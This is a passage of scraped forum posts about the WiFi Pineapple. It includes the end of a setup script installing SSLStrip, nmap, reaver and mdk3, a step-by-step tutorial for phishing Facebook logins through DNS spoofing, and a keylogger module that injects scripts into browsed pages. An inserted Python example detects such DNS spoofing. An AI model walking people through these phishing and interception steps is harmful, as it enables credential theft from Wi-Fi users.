                if [[ "$usrYesNo" == '' ]]; then
                    usrYesNo='y'
                fi
                if [ $usrYesNo == 'y' ]; then
                    echo 'Removing: /usb/usr/'
                    rm -r /usb/usr/
                fi
            fi
            if [ -d /usb/var/ ]; then
                echo -n -e "Remove /usb/var/ "$cyan"(y)/n? "$textReset
                read varYesNo
                if [[ "$varYesNo" == '' ]]; then
                    varYesNo='y'
                fi
                if [ $varYesNo == 'y' ]; then
                    echo 'Removing: /usb/var/'
                    rm -r /usb/var/
                fi
            fi
            echo -e $textReset
        fi


        # /logs/ folder to USB:
        if [ $logsToUSB = true ]; then
            if [ -d /pineapple/logs/ ]; then
                # Moving logs folder to USB is experimental, After this change the usb drive must remain inserted at all times
                echo 'Moving /pineapple/logs/ folder to /usb/logs/, and sym linking back to /pineapple/logs'
                echo -e $yellow$bold'WARNING!!! from this point on the usb drive must be inserted at all times!'$boldEnd
                mv /pineapple/logs/ /usb/
                ln -s /usb/logs/ /pineapple/logs
                echo 'To revert back: rm /pineapple/logs; mv /usb/logs/ /pineapple/'
            else
                echo -e $lightRed'/pineapple/logs folder not found, most likely script needs to be updated, firmware may have changed'
            fi
            echo -e $textReset
        fi




        # OPKG Update:
        if [ $isThereInternet = true ]; then
            opkg update
            echo
            echo -e $textReset


            # Install SSLStrip:
            if [ $installSSLStrip = true ]; then
                # This will take a couple minutes to complete
                echo 'Installing SSLStrip, This will take a moment to complete...'
                opkg --dest usb install sslstrip
                touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install TCPDump:
            if [ $installTCPDump = true ]; then
                echo 'Installing TCPDump'
                opkg --dest usb install tcpdump
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install NMap:
            if [ $installNMap = true ]; then
                echo 'Installing NMap'
                opkg --dest usb install nmap
                echo
                echo
                echo -e $textReset
            fi
    
    
            # Install Reaver:
            if [ $installReaver = true ]; then
                echo 'Installing Reaver'
                opkg --dest usb install reaver
                echo
                echo
                echo -e $textReset
            fi


            # Install MDK3:
            if [ $installMDK3 = true ]; then
                echo 'Installing MDK3'
                opkg --dest usb install mdk3
                echo
                echo
                echo -e $textReset
            fi


            # Needed extras for packages installed to /usb/
            if [ -d /usb/etc/ ]; then
                echo 'Sym linking /usb/etc/* with /etc/'
                ls /usb/etc/
                ln -s /usb/etc/* /etc/
                echo
            fi
            
            if [ -d /usb/usr/sbin/ ]; then
                echo 'Sym linking /usb/usr/sbin/* with /usr/sbin/'
                ls /usb/usr/sbin/
                ln -s /usb/usr/sbin/* /usr/sbin/
                echo
            fi
            
            if [ -d /usb/usr/share/ ]; then
                echo 'Sym linking /usb/usr/share/* with /usr/share/'
                ls /usb/usr/share/
                ln -s /usb/usr/share/* /usr/share/
                echo
            fi
            
            if [ -d /usb/usr/lib/ ]; then
                echo 'Sym linking /usb/usr/lib/*.* with /usr/lib/'
                ls /usb/usr/lib/
                ln -s /usb/usr/lib/*.* /usr/lib/
                echo
            fi
            
            if [ -d /usb/usr/include/ ]; then
                if [ ! -d /usr/include/ ]; then
                    echo 'Making directory /usr/include'
                    mkdir /usr/include
                fi
                echo 'Sym linking /usb/usr/include/* with /usr/include/'
                ls /usb/usr/include/
                ln -s /usb/usr/include/* /usr/include/
            fi

            echo
            echo

        fi # End of Internet Functions




    fi
fi
#####
####
###
##
# End of USB Functions






# Change root password:
if [ $changeRootPassword = true ]; then
    echo -n -e "Change root password to:"$yellow$newrootpassword$cyan" (y)/n? "$textReset
    read newPasswordYesNo
    if [[ "$newPasswordYesNo" == '' ]]; then
        newPasswordYesNo='y'
    fi
    if [ $newPasswordYesNo == 'y' ]; then
        echo -e $newrootpassword'\n'$newrootpassword | passwd
        echo -e 'New password for root: '$yellow$newrootpassword
        echo -e $textReset'Warning if root password is lost serial connection is required!!!'
    fi
    echo
    echo -e $textReset
fi


# Restart Pineapple UI Port:
if [ $changePineapplePort = true ]; then
    echo -e $textReset'Rebooting uhttpd server...'
    /etc/init.d/uhttpd restart
    echo -e $textReset
fi


echo
echo
echo -e $cyan'Issue reboot to finish'$textReset


 


Read through to see what it is setting up. There are links to the files in the script, or just comment out that stuff.
:-D




#198278 Site Survey

Posted by Whistle Master on 18 March 2012 - 02:02 PM

Hi everyone !

I'm currently working on a site survey add-on for our pineapple.

To be able to list APs, you have to switch down / up the wireless interface, and to list clients you have to switch down / up the monitor interface.
Can be done through the interface.

Module is available through module system.



#217679 WiFi Hak Kit

Posted by madhak on 02 February 2013 - 08:09 PM

I just got my pineapple a day ago, first thing I did right after testing its awesomeness was to replace the old dd-wrt linksys router from my WiFi Kit. Here's the result;


 

The Kit consists of the following parts:

- WiFi Pineapple MK4
- Ralink 300mW USB WiFi radio
- 3G Modem, Router, AP
- 4 port USB2.0 Hub
- WiSpy 2.4 spectrum analyzer
- WiSpy device finder (directional antenna)
- High gain patch directional antenna
- USB Bluetooth 2.0 dongle
- 32Gb USB Key device (USB SwissKnife 2.0 pictured)
- 12v 6000mAh LiPo battery
- 2000mW WiFi Booster (inside the accessory bag)
- 5v 3A UBEC (Voltage regulator)
- Accessory bag (with different antenna, patch, cable and gender changer)

 

I get about 8h with everything on with the huge battery. It also has enough Amps to jump start a car (can always be useful if wardriving) ... The 2 directional antennas really work, I could leave it a few blocks away. For longer range there is a 2W booster in the accessory pouch, but the battery would drain twice as fast, plus the fact that transmitting at 2W requires a HAM licence.

 

I’m planning to replace the Ralink radio with an Alpha. While the pineapple fully recognizes the Ralink, it can’t perform Deauth and other functions that the Alpha can do. Still, I can use it to connect to the Pineapple, which can perform the more advanced functions.

 

I’ll also replace the WiSpy with a Ubertooth because the WiSpy is not supported on the Pineapples. The Ubertooth will also replace the cheap USB Bluetooth dongle currently used. The WiSpy and everything connected to the USB Hub can be connected to a laptop instead of the Pineapple, so it's not completely useless. There is also the HakRF project that looks very interesting considering I work a lot with RF, not just WiFi.

 

The Kit can easily communicate with my Omega Kit through the UART interface of the Pineapples, but I don’t see many scenarios where that would be needed.


 
 



#215591 New Web Interface for Hacking Functionalities

Posted by Moriarty on 31 December 2012 - 06:05 AM

https://www.dropbox..../uwui_05.tar.gz

I present the first UWUI dual system version!!!! This version runs in the PINEAPPLE and in Backtrack!!!!!

Install:

Pineapple Install:
- You need to have a USB working in the pineapple.
- You need to have installed (nmap, tcpdump, sslstrip). You can install these modules in the pineapple or use opkg

1. In the computer decompress uwui_05.tar.gz
2. Copy to the Pineapple USB the uwui directory (you can put it where you want)
3. Make a link in the Pineapple /www directory (ln -s /usb/uwui /www/uwui)
4. Connect to the pineapple
5. In firefox go to http://172.16.42.1/uwui/index.php

Happy New Year!!!!

If you want to make a donation to me, I would be very pleased to use this money for Hackers for Charity.
You can use this link:
http://www.hackersforcharity.org/donate


#215252 Thanks!

Posted by airman_dopey on 25 December 2012 - 02:57 PM

Hey moderators,

No problems here. Trying out my shiny new pineapple and checking the forums for solutions and finding you guys promptly replying to multiple people not reading. I'm sure you're beating your collective heads against the wall, especially this time of the year, but I wanted to say thank you for helping us out and taking time away from your families. What you guys do is greatly appreciated by the community whether it is stated or not.

Hope you guys have a very merry Christmas!

-James


#213636 Future versions for the MK4

Posted by Sebkinne on 26 November 2012 - 08:25 AM

Hey everyone,

Something that has been asked again and again is "What is coming next"? You wanted a list of concrete planned things for the next, so here it is!

What of the below things do you want to see next? Have we left something out that you really want? Something crucial we forgot? Let us know here!
This does not include the below features/changes that are being made to cloud.wifipineapple.com. Those are almost complete and will go live very soon.

Pineapple Features:
  • Reset ALL user data. Messed something up bad?
    This may be your way of saving your device.
  • Modules
         -Multi-install modules
         -Keep modules after upgrade
         -Downloading: Progress indicator
         -Change color of out of date modules so that they can be located faster
  • Keep some things (like modules) after an upgrade.
  • Built in Macchanger
  • Network manager UI (includes tethering etc. Will only support onboard devices - use modules for other things)
  • LED controller
  • Select what interface you want to launch Karma from
  • Optional "Sticky" Navbar (will always be on top of screen even if you scroll).
  • Integration of anonymous statistical information gathering.


Pineapple Bug Fixes:
  • Fix module updates failing
  • Fix changing password through UI if it has spaces / illegal characters.


Cloud Website:
  • Re-vamped user experience.
  • Make suggestions / bug reports.
  • VOTE on what features you would like to see.

Please leave any comments and suggestions in this thread.


#209730 Ask** Phishing Tut

Posted by loozr on 12 September 2012 - 07:57 AM

Ok, I'll give it a try, just to test my (non-existing) skill of writing guides :)


In my example I'm going to use Chrome as browser, Notepad++ as editor, WinSCP as file transfer to the Pineapple and facebook as my target.
Otherwise all my pineapple configurations are standard, and I'm using USB storage and symlink to the www folder.

Copy, and edit your site


Transfer the edited Site


Symlink the .htm files to /www/


From this step there are slightly different ways to achieve different results. If you would like the url in your browser to look like the real deal, then follow my next guideline, otherwise I guess you would be fine with jumping to the DNS Spoof section. This would leave the /www/index.php in the original state.

Make the URL look real


Spoof DNS


Now, one thing to remember is that you will of course have to be connected to the pineapple for this to work, and that you might have to clear your cache before the DNS resolves to the pineapple.
If you are in Windows, fire up the command line, enter ipconfig /flushdns and try to ping facebook.com. If everything is ok you should get a reply from 172.16.42.1.
Test that it works by entering facebook.com in your browser and try to enter anything in username/pass. If everything works as expected you should be able to see what you entered in the Logs page if you have a fairly new flash, otherwise you can check the file /www/pineapple/logs/phish.log


And last but not least, all this is information that I have gathered around the forums, so none of this is my work. Credit goes to several users on the forums that have shared information!
That said, I'm hoping that if I have forgotten anything, or have misled anyone I'm hoping you could correct this for me, since I'm not the best writer out there.
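
The symptom described in the post above (a public site answering from 172.16.42.1) is also what a client-side check can look for. The following is an added example, not part of the original post: it flags public hostnames whose DNS answer falls in a non-public range or equals the default gateway. The sample data, the `gateway` parameter and the list of internal suffixes are assumptions made for the illustration.

```python
import ipaddress

# Ranges that a public hostname should never resolve to.
NON_PUBLIC_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8",      # loopback, link-local, "this network"
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 loopback, ULA, link-local
)]

# Assumption: names under these suffixes are local and may legitimately be private.
INTERNAL_SUFFIXES = (".lan", ".local", ".home.arpa", ".internal")

# Constructed sample of (hostname, answer) pairs; not real capture data.
SAMPLE_ANSWERS = [
    ("facebook.com", "172.16.42.1"),    # the answer the post expects after spoofing
    ("facebook.com", "203.0.113.10"),   # documentation-range stand-in for a public IP
    ("printer.lan", "192.168.1.20"),    # internal name, private answer is normal
    ("example.net", "fe80::1"),
    ("example.org", "not-an-ip"),
]


def classify_answer(hostname, answer, gateway=None):
    """Return (verdict, reason); verdict is 'ok', 'suspicious' or 'invalid'."""
    try:
        addr = ipaddress.ip_address(answer)
    except ValueError:
        return "invalid", "answer is not an IP address"
    name = hostname.rstrip(".").lower()
    # Single-label and internal-suffix names are expected to stay on the LAN.
    if "." not in name or name.endswith(INTERNAL_SUFFIXES):
        return "ok", "local name, private answers are expected"
    if gateway is not None and addr == ipaddress.ip_address(gateway):
        return "suspicious", "public name resolves to the default gateway"
    for net in NON_PUBLIC_NETS:
        if addr.version == net.version and addr in net:
            return "suspicious", f"public name resolves into {net}"
    return "ok", "answer is outside the non-public ranges"


def scan(answers, gateway=None):
    """Return the (hostname, answer, reason) tuples judged suspicious."""
    hits = []
    for hostname, answer in answers:
        verdict, reason = classify_answer(hostname, answer, gateway)
        if verdict == "suspicious":
            hits.append((hostname, answer, reason))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_ANSWERS, gateway="172.16.42.1"):
        print("SUSPICIOUS %s -> %s (%s)" % hit)
```
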


#217545 Keylogger module - release

Posted by Sebkinne on 31 January 2013 - 11:34 AM

Hey everyone,

 

As you all know, Digininja and WhistleMaster have been working hard to bring you their Keylogger infusion.

This infusion is now ready and you will find it in your local Pineapple bar.

 

Seeing as this is a rather complex module, there are bound to be issues with it.

Some of the issues we know about, some we don't. We ask you to report any issues you are having / any bugs you are experiencing. Please do this in an ordered fashion. Read through the entire thread and see if your issue has already been reported. If so and you have more to add, please quote the issue and add your findings to it. 

 

Please do not complain that something doesn't work. We are all working together to make this a great module, but please don't ask for ETAs.

 

Note that for the module to work you may need to run the 2.7.5 firmware. This is due to kernel dependencies of ebtables.

 

List of known issues upon release:

  • If the browser sends a GET request that has the full url ie "GET http://blah.com/file HTTP/1.1" instead of "GET http://blah.com/file HTTP/1.1", some pages will fail to load (wikimedia for example - means no CSS for wikipedia).
  • If an input field already has an onkeypress method attached to it, it will get overwritten - this will probably break the site's functionality. Can be fixed quite quickly but more on that later.
  • The install_keylogger() javascript function doesn't always fire if the page takes too long to load. 
  • Typing in input forms has a bit of a lag about it. Not much we can do about that.

 

We are looking forward to your feedback and hope you enjoy this module! We will keep enhancing its performance and reliability and try to iron out any issues found.




#216830 Occupineapple Module

Posted by Whistle Master on 20 January 2013 - 03:47 AM

Hi !
 
I wanted to share with the community my new module: Occupineapple :) (Sounds familiar, isn't it :P) This is indeed based on Darren’s idea (Darren, if you pass through, I'm interested to have your feedback / thoughts ;) )
 
Features:
- based on mdk3
- autostart
- Configuration (speed, channel)
- Choose SSID list to broadcast (if no list is specified, random SSIDs are broadcasted)
- SSID lists editor
- List can be with (*.mlist extension) or without MAC addresses (*.list extension)
 